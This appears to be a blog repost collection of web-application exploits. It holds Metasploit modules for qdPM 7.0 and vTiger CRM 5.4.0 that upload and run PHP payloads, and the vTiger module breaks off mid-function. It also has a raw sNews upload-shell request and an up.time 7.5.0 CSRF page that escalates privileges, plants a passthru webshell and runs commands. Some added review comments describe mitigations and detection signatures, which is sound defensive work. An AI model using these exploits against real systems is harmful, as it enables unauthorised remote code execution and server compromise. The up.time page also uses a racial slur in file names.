Minggu, 20 Mei 2018

qdPM 7.0 - Arbitrary '.PHP' File Upload


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

# Metasploit module (legacy Metasploit3 class name) for the qdPM 7.0
# profile-photo upload flaw. Exploitation is *authenticated*: USERNAME and
# PASSWORD are required options, so from a defender's view this is a
# post-credential-compromise file-upload defect, not an unauthenticated one.
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::EXE

    # Module metadata and datastore options.
    #
    # Two targets are declared: an in-process PHP payload and a Linux x86
    # binary dropped and run through PHP (see #get_write_exec_payload).
    #
    # @param info [Hash] module info merged by update_info
    def initialize(info={})
        super(update_info(info,
            'Name'           => "qdPM v7 Arbitrary PHP File Upload Vulnerability",
            'Description'    => %q{
                This module exploits a vulnerability found in qdPM - a web-based project management
                software. The user profile's photo upload feature can be abused to upload any
                arbitrary file onto the victim server machine, which allows remote code execution.
                Please note in order to use this module, you must have a valid credential to sign
                in.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'loneferret', #Discovery, PoC
                    'sinn3r'      #Metasploit
                ],
            'References'     =>
                [
                    ['OSVDB', '82978'],
                    ['EDB', '19154']
                ],
            'Payload'        =>
                {
                    'BadChars' => "\x00"
                },
            'DefaultOptions'  =>
                {
                    'ExitFunction' => "none"
                },
            'Platform'       => ['linux', 'php'],
            'Targets'        =>
                [
                    [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }  ],
                    [ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
                ],
            'Privileged'     => false,
            'DisclosureDate' => "Jun 14 2012",
            'DefaultTarget'  => 0))

        # NOTE(review): the TARGETURI description mentions "sflog!", which is a
        # different application -- looks like a copy/paste leftover; the option
        # is the qdPM base directory.
        register_options(
            [
                OptString.new('TARGETURI', [true, 'The base directory to sflog!', '/qdPM/']),
                OptString.new('USERNAME',  [true, 'The username to login with']),
                OptString.new('PASSWORD',  [true, 'The password to login with'])
            ], self.class)
    end

    # Fingerprints the target by the version string in the page footer.
    #
    # Appends a trailing '/' to TARGETURI in place (String#<< mutates
    # target_uri.path), derives the base directory, fetches index.php and
    # looks for "qdPM X.Y" inside <div id="footer">. Major and minor digits
    # are concatenated as strings ("7" + "0" => "70") before the <= 70
    # comparison, so only single-digit version components are handled.
    #
    # @return [Msf::Exploit::CheckCode] Vulnerable for a footer version <= 7.0;
    #   Safe otherwise -- including when no version banner is present, so a
    #   footer with the banner removed makes this check report Safe.
    def check
        target_uri.path << '/' if target_uri.path[-1,1] != '/'
        base = File.dirname("#{target_uri.path}.")

        res = send_request_raw({'uri'=>"#{base}/index.php"})
        if res and res.body =~ /<div id\=\"footer\"\>.+qdPM ([\d])\.([\d]).+\<\/div\>/m
            major, minor = $1, $2
            return Exploit::CheckCode::Vulnerable if (major+minor).to_i <= 70
        end

        return Exploit::CheckCode::Safe
    end

    # Builds the PHP dropper used by the Linux target: it writes a
    # base64-encoded native payload to fname, chmods it and executes it.
    #
    # NOTE(review): the +data+ parameter is never used -- the method calls
    # generate_payload_exe itself, so the caller in #exploit generates the
    # executable a second time for nothing.
    # NOTE(review): gsub(/^\t\t/, '') is meant to strip the literal's leading
    # indentation but only matches two tabs; as rendered here the %Q literal
    # is indented with spaces, in which case that strip is a no-op and only the
    # newline -> space collapse takes effect. Either way PHP ignores the
    # surrounding whitespace.
    #
    # @param fname [String] path on the target the payload is written to
    # @param data [String] unused (see note above)
    # @return [String] single-line PHP source
    def get_write_exec_payload(fname, data)
        p = Rex::Text.encode_base64(generate_payload_exe)
        php = %Q|
        <?php
        $f = fopen("#{fname}", "wb");
        fwrite($f, base64_decode("#{p}"));
        fclose($f);
        exec("chmod 777 #{fname}");
        exec("#{fname}");
        ?>
        |
        php = php.gsub(/^\t\t/, '').gsub(/\n/, ' ')
        return php
    end

    # Session callback: loads stdapi for meterpreter sessions, then removes
    # the files recorded in @clean_files (populated in #exploit) through the
    # meterpreter file API or a shell `rm`. The names are module-generated
    # random alphas, so interpolating them into the rm command is not a
    # shell-injection concern here.
    #
    # NOTE(review): rescue ::Exception also swallows SystemExit/Interrupt; a
    # plain rescue (StandardError) is the idiomatic choice.
    #
    # @param cli [Msf::Session] the newly opened session
    def on_new_session(cli)
        if cli.type == "meterpreter"
            cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
        end

        @clean_files.each do |f|
            print_status("#{@peer} - Removing: #{f}")
            begin
                if cli.type == 'meterpreter'
                    cli.fs.file.rm(f)
                else
                    cli.shell_command_token("rm #{f}")
                end
            rescue ::Exception => e
                print_error("#{@peer} - Unable to remove #{f}: #{e.message}")
            end
        end
    end

    # Authenticates and scrapes the hidden form values the profile update
    # needs.
    #
    # 1. POSTs login[email]/login[password] to home/login, sending a random
    #    'qdpm' cookie (the inline comment below explains why), and picks the
    #    'qdpm=<value>' session cookie out of Set-Cookie.
    # 2. GETs home/myAccount with that cookie and reads users[id],
    #    users[users_group_id] and users[active] from hidden inputs.
    #
    # Note the Referer built here is "http://#{rhost}/#{base}/..." whereas
    # #upload_php uses "http://#{rhost}#{base}/..."; base starts with '/', so
    # this one carries a doubled slash. Apparently tolerated by the server,
    # but the two should agree.
    #
    # @param base [String] application base path, no trailing slash
    # @param username [String] login e-mail (the form field is login[email])
    # @param password [String] login password
    # @return [Hash] keys 'cookie', 'user_id', 'group_id', 'user_active';
    #   an empty Hash on any failure (no session cookie, no response, 404)
    def login(base, username, password)
        # Login
        res = send_request_cgi({
            'method'    => 'POST',
            'uri'       => "#{base}/index.php/home/login",
            'vars_post' => {
                'login[email]'    => username,
                'login[password]' => password,
                'http_referer'    => ''
            },
            # This needs to be set, otherwise we get two cookies... I don't need two cookies.
            'cookie'     => "qdpm=#{Rex::Text.rand_text_alpha(27)}",
            'headers'   => {
                'Origin' => "http://#{rhost}",
                'Referer' => "http://#{rhost}/#{base}/index.php/home/login"
            }
        })

        cookie = (res and res.headers['Set-Cookie'] =~ /qdpm\=.+\;/) ? res.headers['Set-Cookie'] : ''
        return {} if cookie.empty?
        cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0]

        # Get user data
        vprint_status("#{@peer} - Enumerating user data")
        res = send_request_raw({
            'uri' => "#{base}/index.php/home/myAccount",
            'cookie' => cookie
        })

        return {} if not res
        if res.code == 404
            print_error("#{@peer} - #{username} does not actually have a 'myAccount' page")
            return {}
        end

        b = res.body

        # Each scrape falls back to '' when the hidden input is missing; the
        # upload then proceeds with empty ids rather than aborting.
        user_id = b.scan(/\<input type\=\"hidden\" name\=\"users\[id\]\" value\=\"(.+)\" id\=\"users\_id\" \/\>/).flatten[0] || ''
        group_id = b.scan(/\<input type\=\"hidden\" name\=\"users\[users\_group\_id\]\" value\=\"(.+)\" id\=\"users\_users\_group\_id\" \/>/).flatten[0] || ''
        user_active = b.scan(/\<input type\=\"hidden\" name\=\"users\[active\]\" value\=\"(.+)\" id\=\"users\_active\" \/\>/).flatten[0] || ''

        opts = {
            'cookie'     => cookie,
            'user_id'     => user_id,
            'group_id'    => group_id,
            'user_active' => user_active
        }

        return opts
    end

    # Submits the profile form as multipart/form-data with the PHP source in
    # the users[photo] part under a '.php' filename. The server-side defect
    # exercised here is that this field's filename/extension is not validated
    # and the stored file is later served from uploads/users/ (see #exec_php);
    # a fix would whitelist image extensions/MIME types on the server and keep
    # the upload directory non-executable.
    #
    # The gsub on the serialized message strips a CRLF that precedes a
    # '--_Part_' boundary at the start of a line (presumably the leading one
    # Rex::MIME::Message emits). Success is inferred from a redirect whose
    # Location ends in home/myAccount.
    #
    # @param base [String] application base path
    # @param opts [Hash] 'filename', 'data', 'user_id', 'group_id',
    #   'user_active', 'username', 'email', 'cookie'
    # @return [Boolean] true when the post-upload redirect was observed
    def upload_php(base, opts)
        fname       = opts['filename']
        php_payload = opts['data']
        user_id     = opts['user_id']
        group_id    = opts['group_id']
        user_active = opts['user_active']
        username    = opts['username']
        email       = opts['email']
        cookie      = opts['cookie']

        data = Rex::MIME::Message.new
        data.add_part('UsersAccountForm', nil, nil, 'form-data; name="formName"')
        data.add_part('put', nil, nil, 'form-data; name="sf_method"')
        data.add_part(user_id, nil, nil, 'form-data; name="users[id]"')
        data.add_part(group_id, nil, nil, 'form-data; name="users[users_group_id]"')
        data.add_part(user_active, nil, nil, 'form-data; name="users[active]"')
        data.add_part('', nil, nil, 'form-data; name="users[skin]"')
        data.add_part(username, nil, nil, 'form-data; name="users[name]"')
        data.add_part(php_payload, nil, nil, "form-data; name=\"users[photo]\"; filename=\"#{fname}\"")
        data.add_part('', nil, nil, 'form-data; name="preview_photo"')
        data.add_part(email, nil, nil, 'form-data; name="users[email]"')
        data.add_part('en_US', nil, nil, 'form-data; name="users[culture]"')
        data.add_part('', nil, nil, 'form-data; name="new_password"')

        post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

        res = send_request_cgi({
            'method'  => 'POST',
            'uri'     => "#{base}/index.php/home/myAccount",
            'ctype'   => "multipart/form-data; boundary=#{data.bound}",
            'data'    => post_data,
            'cookie'  => cookie,
            'headers' => {
                'Origin' => "http://#{rhost}",
                'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"
            }
        })

        return (res and res.headers['Location'] =~ /home\/myAccount$/) ? true : false
    end

    # Locates and triggers the uploaded file. qdPM renames the photo on
    # save; the new name is read back from the hidden preview_photo input on
    # home/myAccount (expected shape: <digits>-<word>.php), then a single GET
    # of uploads/users/<name> runs it. Execution is only possible because that
    # directory is served with PHP enabled -- disallowing script execution
    # under uploads/ is the corresponding mitigation.
    #
    # NOTE(review): "renmaed" in the status message is a typo for "renamed";
    # left untouched here because it is a runtime string.
    #
    # @param base [String] application base path
    # @param opts [Hash] must contain 'cookie'
    # @return [void] returns early with an error when the page or the
    #   filename cannot be retrieved
    def exec_php(base, opts)
        cookie = opts['cookie']

        # When we upload a file, it will be renamed. The 'myAccount' page has that info.
        res = send_request_cgi({
            'uri'    => "#{base}/index.php/home/myAccount",
            'cookie' => cookie
        })

        if not res
            print_error("#{@peer} - Unable to request the file")
            return
        end

        fname = res.body.scan(/\<input type\=\"hidden\" name\=\"preview\_photo\" id\=\"preview\_photo\" value\=\"(\d+\-\w+\.php)\" \/\>/).flatten[0] || ''
        if fname.empty?
            print_error("#{@peer} - Unable to extract the real filename")
            return
        end

        # Now that we have the filename, request it
        print_status("#{@peer} - Uploaded file was renmaed as '#{fname}'")
        send_request_raw({'uri'=>"#{base}/uploads/users/#{fname}"})
        handler
    end

    # Main flow: login -> build the payload for the selected target ->
    # upload -> request the stored file. @clean_files is populated here and
    # consumed by #on_new_session.
    #
    # users[name] is derived from the part of USERNAME before '@' (the login
    # form takes an e-mail address); a USERNAME without '@' yields ''.
    # Note that the first status line prints PASSWORD in clear to the
    # console/log.
    #
    # @return [void]
    def exploit
        @peer = "#{rhost}:#{rport}"

        target_uri.path << '/' if target_uri.path[-1,1] != '/'
        base = File.dirname("#{target_uri.path}.")

        user = datastore['USERNAME']
        pass = datastore['PASSWORD']
        print_status("#{@peer} - Attempt to login with '#{user}:#{pass}'")
        opts = login(base, user, pass)
        if opts.empty?
            print_error("#{@peer} - Login unsuccessful")
            return
        end

        php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"
        @clean_files = [php_fname]

        # Only the two declared targets exist, so one of these branches always
        # assigns p.
        case target['Platform']
        when 'php'
            p = "<?php #{payload.encoded} ?>"
        when 'linux'
            bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin"
            @clean_files << bin_name
            bin = generate_payload_exe
            p = get_write_exec_payload("/tmp/#{bin_name}", bin)
        end

        print_status("#{@peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
        opts = opts.merge({
            'username' => user.scan(/^(.+)\@.+/).flatten[0] || '',
            'email'    => user,
            'filename' => php_fname,
            'data'     => p
        })
        uploader = upload_php(base, opts)
        if not uploader
            print_error("#{@peer} - Unable to upload")
            return
        end

        print_status("#{@peer} - Executing '#{php_fname}'")
        exec_php(base, opts)
    end
end

Minggu, 25 Maret 2018

sNews 1.7.1






# Exploit Title : Snews CMS upload sheller
# Author : Ashiyane Digital Security Team
# Google Dork : "This site is powered by sNews"
# Date :  04/11/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://snewscms.com/
# Software link : http://snewscms.com/download/snews1.7.1.zip
# Version : 1.7(latest)
#######################################################3
Admin access is needed to upload files, but any file type (.php, .exe, ...) can then be uploaded
without any bypass, because the upload form does not filter by extension.
1-goto http://SiteName/snews_files/
2- click the Browse button and select your file
3- click on upload
The uploaded file is then reachable at:
http://SiteName/shell.php

poc url:
http://localhost/snews_files/

Poc header:

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/snews_files/
Cookie: PHPSESSID=am9ffv1sg2kjkfnaku69tfgsu5
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
boundary=---------------------------92741037415004
Content-Length: 665

-----------------------------92741037415004\r\n
Content-Disposition: form-data; name="upload_dir"\r\n
\r\n
.\r\n
-----------------------------92741037415004\r\n
Content-Disposition: form-data; name="imagefile"; filename="shell.php"\r\n
Content-Type: application/\r\n
\r\n
<?php phpinfo ?><br>\r\n
-----------------------------92741037415004\r\n
Content-Disposition: form-data; name="ip"\r\n
\r\n
127.0.0.1\r\n
-----------------------------92741037415004\r\n
Content-Disposition: form-data; name="time"\r\n
\r\n
1478199661\r\n
-----------------------------92741037415004\r\n
Content-Disposition: form-data; name="upload"\r\n
\r\n
Upload\r\n
-----------------------------92741037415004--\r\n

Sabtu, 24 Maret 2018

ta3arof [dating]





| # Exploit  :
|
| 1- http://server/ta3arof/add.php *Register
|
| 2- Up your Ev!l
|
| 3- find it there
| http://server/ta3arof/members/uploads/
| http://server/ta3arof/members/uploads/1039708483/c.php

Jumat, 23 Maret 2018

up.time 7.5.0





<html>
 <head>
 <title>Uptime Exploit</title>
 </head>

<body onload="runme();">


<!-- Login -->
<form name="login" action="http://127.0.0.1:9999/index.php" method="POST" target="frame0">
      <input type="hidden" name="username" value="sample" />
      <input type="hidden" name="password" value="123456" />
    </form>

<!-- Escalate privileges -->
   <form name="privadm" action="http://127.0.0.1:9999/main.php?section=UserContainer&subsection=edit&id=2" method="POST" target="frame1">
      <input type="hidden" name="operation" value="submit" />
      <input type="hidden" name="disableEditOfUsernameRoleGroup" value="false" />
      <input type="hidden" name="username" value="sample" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="passwordConfirm" value="123456" />
      <input type="hidden" name="firstname" value="Sample" />
      <input type="hidden" name="lastname" value="User" />
      <input type="hidden" name="location" value="" />
      <input type="hidden" name="emailaddress" value="" />
      <input type="hidden" name="emailtimeperiodid" value="1" />
      <input type="hidden" name="phonenumber" value="" />
      <input type="hidden" name="phonenumbertimeperiodid" value="1" />
      <input type="hidden" name="windowshost" value="" />
      <input type="hidden" name="windowsworkgroup" value="" />
      <input type="hidden" name="windowspopuptimeperiodid" value="1" />
      <input type="hidden" name="landingpage" value="MyPortal" />
      <input type="hidden" name="isonvacation" value="0" />
      <input type="hidden" name="receivealerts" value="0" />
      <input type="hidden" name="activexgraphs" value="0" />
      <input type="hidden" name="newuser" value="on" />
      <input type="hidden" name="newuser" value="1" />
      <input type="hidden" name="userroleid" value="1" />
      <input type="hidden" name="usergroupid&#91;&#93;" value="1" />
    </form>

<!-- Log-off to refresh permission -->
    <form name="logoff" action="http://127.0.0.1:9999/main.php" method="POST" target="frame2">
      <input type="hidden" name="logout" value="1" />
    </form>

<!-- Login with escalated user -->
    <form name="login2" action="http://127.0.0.1:9999/index.php?loggedout" method="POST" target="frame3">
      <input type="hidden" name="username" value="sample" />
      <input type="hidden" name="password" value="123456" />
    </form>

<!-- Creating Monitor to  rename php shell -->
<form  name="createmonitor" action="http://127.0.0.1:9999/main.php?section=ERDCInstance&subsection=add" method="POST" target="frame4">
      <input type="hidden" name="initialERDCId" value="20" />
      <input type="hidden" name="target" value="1" />
      <input type="hidden" name="targetType" value="systemList" />
      <input type="hidden" name="systemList" value="1" />
      <input type="hidden" name="serviceGroupList" value="&#45;10" />
      <input type="hidden" name="initialMode" value="standard" />
      <input type="hidden" name="erdcName" value="Exploit" />
      <input type="hidden" name="erdcInitialName" value="" />
      <input type="hidden" name="erdcDescription" value="Exploit" />
      <input type="hidden" name="hostButton" value="system" />
      <input type="hidden" name="erdc&#95;id" value="20" />
      <input type="hidden" name="forceReload" value="0" />
      <input type="hidden" name="operation" value="standard" />
      <input type="hidden" name="erdc&#95;instance&#95;id" value="" />
      <input type="hidden" name="label&#95;&#91;184&#93;" value="Script&#32;Name" />
      <input type="hidden" name="value&#95;&#91;184&#93;" value="c&#58;&#92;windows&#92;system32&#92;cmd&#46;exe" />
      <input type="hidden" name="id&#95;&#91;184&#93;" value="process" />
      <input type="hidden" name="name&#95;&#91;process&#93;" value="184" />
      <input type="hidden" name="units&#95;&#91;184&#93;" value="" />
      <input type="hidden" name="guiBasic&#95;&#91;184&#93;" value="1" />
      <input type="hidden" name="inputType&#95;&#91;184&#93;" value="GUIString" />
      <input type="hidden" name="screenOrder&#95;&#91;184&#93;" value="1" />
      <input type="hidden" name="parmType&#95;&#91;184&#93;" value="1" />
      <input type="hidden" name="label&#95;&#91;185&#93;" value="Arguments" />
      <input type="hidden" name="value&#95;&#91;185&#93;" value="&#32;&#47;C&#32;ren&#32;"C&#58;&#92;Program&#32;Files&#92;uptime&#32;software&#92;uptime&#92;GUI&#92;wizards&#92;nigga&#46;txt"&#32;"nigga&#46;php"&#32;" />
      <input type="hidden" name="id&#95;&#91;185&#93;" value="args" />
      <input type="hidden" name="name&#95;&#91;args&#93;" value="185" />
      <input type="hidden" name="units&#95;&#91;185&#93;" value="" />
      <input type="hidden" name="guiBasic&#95;&#91;185&#93;" value="1" />
      <input type="hidden" name="inputType&#95;&#91;185&#93;" value="GUIString" />
      <input type="hidden" name="screenOrder&#95;&#91;185&#93;" value="2" />
      <input type="hidden" name="parmType&#95;&#91;185&#93;" value="1" />
      <input type="hidden" name="label&#95;&#91;187&#93;" value="Output" />
      <input type="hidden" name="can&#95;retain&#95;&#91;187&#93;" value="false" />
      <input type="hidden" name="comparisonWarn&#95;&#91;187&#93;" value="&#45;1" />
      <input type="hidden" name="comparison&#95;&#91;187&#93;" value="&#45;1" />
      <input type="hidden" name="id&#95;&#91;187&#93;" value="value&#95;critical&#95;output" />
      <input type="hidden" name="name&#95;&#91;output&#93;" value="187" />
      <input type="hidden" name="units&#95;&#91;187&#93;" value="" />
      <input type="hidden" name="guiBasic&#95;&#91;187&#93;" value="1" />
      <input type="hidden" name="inputType&#95;&#91;187&#93;" value="GUIString" />
      <input type="hidden" name="screenOrder&#95;&#91;187&#93;" value="4" />
      <input type="hidden" name="parmType&#95;&#91;187&#93;" value="2" />
      <input type="hidden" name="label&#95;&#91;189&#93;" value="Response&#32;time" />
      <input type="hidden" name="can&#95;retain&#95;&#91;189&#93;" value="false" />
      <input type="hidden" name="comparisonWarn&#95;&#91;189&#93;" value="&#45;1" />
      <input type="hidden" name="comparison&#95;&#91;189&#93;" value="&#45;1" />
      <input type="hidden" name="id&#95;&#91;189&#93;" value="value&#95;critical&#95;timer" />
      <input type="hidden" name="name&#95;&#91;timer&#93;" value="189" />
      <input type="hidden" name="units&#95;&#91;189&#93;" value="ms" />
      <input type="hidden" name="guiBasic&#95;&#91;189&#93;" value="0" />
      <input type="hidden" name="inputType&#95;&#91;189&#93;" value="GUIInteger" />
      <input type="hidden" name="screenOrder&#95;&#91;189&#93;" value="6" />
      <input type="hidden" name="parmType&#95;&#91;189&#93;" value="2" />
      <input type="hidden" name="timing&#95;&#91;erdc&#95;instance&#95;monitored&#93;" value="1" />
      <input type="hidden" name="timing&#95;&#91;timeout&#93;" value="60" />
      <input type="hidden" name="timing&#95;&#91;check&#95;interval&#93;" value="10" />
      <input type="hidden" name="timing&#95;&#91;recheck&#95;interval&#93;" value="1" />
      <input type="hidden" name="timing&#95;&#91;max&#95;rechecks&#93;" value="3" />
      <input type="hidden" name="alerting&#95;&#91;notification&#93;" value="1" />
      <input type="hidden" name="alerting&#95;&#91;alert&#95;interval&#93;" value="120" />
      <input type="hidden" name="alerting&#95;&#91;alert&#95;on&#95;critical&#93;" value="1" />
      <input type="hidden" name="alerting&#95;&#91;alert&#95;on&#95;warning&#93;" value="1" />
      <input type="hidden" name="alerting&#95;&#91;alert&#95;on&#95;recovery&#93;" value="1" />
      <input type="hidden" name="alerting&#95;&#91;alert&#95;on&#95;unknown&#93;" value="1" />
      <input type="hidden" name="time&#95;period&#95;id" value="1" />
      <input type="hidden" name="pageFinish" value="Finish" />
      <input type="hidden" name="pageContinue" value="Continue&#46;&#46;&#46;" />
      <input type="hidden" name="isWizard" value="1" />
      <input type="hidden" name="wizardPage" value="2" />
      <input type="hidden" name="wizardNumPages" value="2" />
      <input type="hidden" name="wizardTask" value="pageFinish" />
      <input type="hidden" name="visitedPage&#91;1&#93;" value="1" />
      <input type="hidden" name="visitedPage&#91;2&#93;" value="1" />
         </form>


<!-- Uploading php shell txt format -->
    <form name="uploadshell" action="http://127.0.0.1:9999/wizards/post2file.php" method="POST" target="frame5">
      <input type="hidden" name="file&#95;name" value="nigga&#46;txt" />
      <input type="hidden" name="script" value="<&#63;&#32;passthru&#40;&#36;&#95;GET&#91;&apos;cmd&apos;&#93;&#41;&#59;&#32;&#63;>" />
         </form>


<!-- Run command to rename php shell -->
    <form name="run" action="http://127.0.0.1:9999/main.php" method="POST" target="frame6">
      <input type="hidden" name="section" value="RunERDCInstance" />
      <input type="hidden" name="subsection" value="view" />
      <input type="hidden" name="id" value="65535" />
      <input type="hidden" name="name" value="Exploit" />
    </form>


<!-- Executing basic command -->
    <form name="exploit" action="http://127.0.0.1:9999/wizards/nigga.php" METHOD="GET" target="frame7">
    <input type="hidden" name="cmd" value="whoami" />
    </form>


<iframe name="frame0"></iframe>
<iframe name="frame1"></iframe>
<iframe name="frame2"></iframe>
<iframe name="frame3"></iframe>
<iframe name="frame4"></iframe>
<iframe name="frame5"></iframe>
<iframe name="frame6"></iframe>
<iframe name="frame7"></iframe>

<script>
 /**
  * Drives the eight forms above strictly in sequence: each iframe's onload
  * handler submits the next form, so every request waits for the previous
  * response (login -> user edit -> logoff -> re-login -> monitor creation ->
  * text-file upload -> monitor run -> GET of the renamed file). The
  * commented-out document.write calls were progress markers.
  * Each step's success is never checked; the chain advances on any load of
  * the target iframe, including an error page.
  */
 function runme()
 {
 document.login.submit();
 document.getElementsByTagName("iframe")[0].onload = function()
//document.write("Login....")
 {
document.privadm.submit();
document.getElementsByTagName("iframe")[1].onload = function()
//document.write("Mutating to admin uahsuasuas");
 {
document.logoff.submit();
document.getElementsByTagName("iframe")[2].onload = function()
//document.write("Refreshing perms...");
 {
document.login2.submit();
document.getElementsByTagName("iframe")[3].onload = function()
//document.write("Login again...Keep Calm....");
 {
document.createmonitor.submit();
document.getElementsByTagName("iframe")[4].onload = function()
//document.write("Creating F*cking monitor");
 {
document.uploadshell.submit();
document.getElementsByTagName("iframe")[5].onload = function()
//document.write("Uploading webshell. Muaaaaa! Muaaaaa!!");
 {
document.run.submit();
document.getElementsByTagName("iframe")[6].onload = function()
//document.write("Trick to shell... come on....");
 {
document.exploit.submit();
document.getElementsByTagName("iframe")[7].onload = function()
alert('Pwned!!!!!!!!!!!!!!!!!!!!!!')
 }
 }
 }
 }
 }
 }
 }
 }
</script>

</body>
</html>

Kamis, 22 Maret 2018

vTiger CRM 5.4.0 SOAP





require 'msf/core'
require 'rexml/document'

# Metasploit module for vTiger CRM 5.4.0: SOAP requests are processed with an
# empty session (see #check and #add_attachment_soap) and the
# AddEmailAttachment filename is used verbatim, allowing path traversal.
# Unauthenticated -- no credentials are among the options.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include REXML
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  # Module metadata. Payload 'Space' is set high because the PHP source
  # travels base64-encoded inside the SOAP POST body (see comment inline).
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload',
      'Description'    => %q{
          vTiger CRM allows an user to bypass authentication when requesting SOAP services.
          In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP
          service. By combining both vulnerabilities an attacker can upload and execute PHP
          code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu
          10.04 and Windows 2003 SP2.
        },
      'Author'         =>
        [
          'Egidio Romano', # Vulnerability discovery
          'juan vazquez' # msf module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-3214' ],
          [ 'CVE', '2013-3215' ],
          [ 'OSVDB', '95902' ],
          [ 'OSVDB', '95903' ],
          [ 'BID', '61558' ],
          [ 'BID', '61559' ],
          [ 'EDB', '27279' ],
          [ 'URL', 'http://karmainsecurity.com/KIS-2013-07' ],
          [ 'URL', 'http://karmainsecurity.com/KIS-2013-08' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          # Arbitrary big number. The payload is sent base64 encoded
          # into a POST SOAP request
          'Space'       => 262144, # 256k
          'DisableNops' => true
        },
      'Targets' =>
        [
          [ 'vTigerCRM v5.4.0', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2013'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base vTiger CRM directory path", '/vtigercrm/'])
      ], self.class)
  end

  # Two-step probe of the CheckEmailPermission service:
  # 1. with a random (invalid) session the service must answer with a nil
  #    return (<return xsi:nil="true" .../>); anything else is Unknown.
  # 2. with an empty session it must answer with either an empty body or a
  #    non-nil <return xsi:type="xsd:string"> -- i.e. the request was
  #    processed without a valid session, which is the authentication bypass.
  #
  # @return [Msf::Exploit::CheckCode] Vulnerable, Safe or Unknown
  def check
    test_one = check_email_soap("admin", rand_text_alpha(4 + rand(4)))
    res = send_soap_request(test_one)

    unless res and res.code == 200 and res.body.to_s =~ /<return xsi:nil="true" xsi:type="xsd:string"\/>/
      return Exploit::CheckCode::Unknown
    end

    test_two = check_email_soap("admin")
    res = send_soap_request(test_two)

    if res and res.code == 200 and (res.body.blank? or res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/)
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  # Uploads <random>.php through AddEmailAttachment, registers it with
  # FileDropper for post-session cleanup, then requests it under soap/ (the
  # directory the '../' prefix in #add_attachment_soap is meant to land the
  # file in).
  #
  # NOTE(review): the "Uploading payload..." status line is printed *after*
  # the upload request has already been sent, and "Upload successfully
  # uploaded" reads oddly ("Payload successfully uploaded" is presumably the
  # intent). The trailing 0 on send_request_cgi looks like a response timeout
  # so the module does not block on the payload request -- TODO confirm
  # against HttpClient.
  #
  # @return [void]
  # @raise [Msf::Exploit::Failed] via fail_with when the upload is not confirmed
  def exploit
    file_name = rand_text_alpha(rand(10)+6) + '.php'
    php = %Q|<?php #{payload.encoded} ?>|

    soap = add_attachment_soap(file_name, php)
    res = send_soap_request(soap)

    print_status("#{peer} - Uploading payload...")
    if res and res.code == 200 and res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/
      print_good("#{peer} - Upload successfully uploaded")
      register_files_for_cleanup(file_name)
    else
      fail_with(Failure::Unknown, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload...")
    send_request_cgi({'uri' => normalize_uri(target_uri.path, 'soap', file_name)}, 0)
  end

  # Builds the AddEmailAttachment SOAP envelope.
  #
  # The document is assembled with REXML using MSF_PAYLOAD / MSF_FILENAME
  # placeholders; the real values are substituted on the serialized string
  # afterwards (presumably to keep REXML from touching the raw text -- TODO
  # confirm, as base64 and '../' contain nothing REXML would escape).
  # The filename is prefixed with '../../../../../../': the path traversal
  # that makes the server write the file relative to wherever the traversal
  # resolves rather than into the attachment store; #exploit expects it under
  # soap/. For detection, an AddEmailAttachment body on vtigerolservice.php
  # whose <filename> contains '../' or ends in .php is the signature.
  #
  # The <session> element is created but never given text (the request is
  # deliberately unauthenticated), and <filesize> carries the length of the
  # *un-encoded* data.
  #
  # @param file_name [String] target file name, without path
  # @param file_data [String] PHP source to upload
  # @return [String] serialized XML
  def add_attachment_soap(file_name, file_data)
    xml = Document.new
    xml.add_element(
      "soapenv:Envelope",
      {
        'xmlns:xsi'     => "http://www.w3.org/2001/XMLSchema-instance",
        'xmlns:xsd'     => "http://www.w3.org/2001/XMLSchema",
        'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
        'xmlns:crm'     => "http://www.vtiger.com/products/crm"
      })
    xml.root.add_element("soapenv:Header")
    xml.root.add_element("soapenv:Body")
    body = xml.root.elements[2]
    body.add_element(
      "crm:AddEmailAttachment",
      {
        'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
      })
    crm = body.elements[1]
    crm.add_element("emailid", {'xsi:type' => 'xsd:string'})
    crm.add_element("filedata", {'xsi:type' => 'xsd:string'})
    crm.add_element("filename", {'xsi:type' => 'xsd:string'})
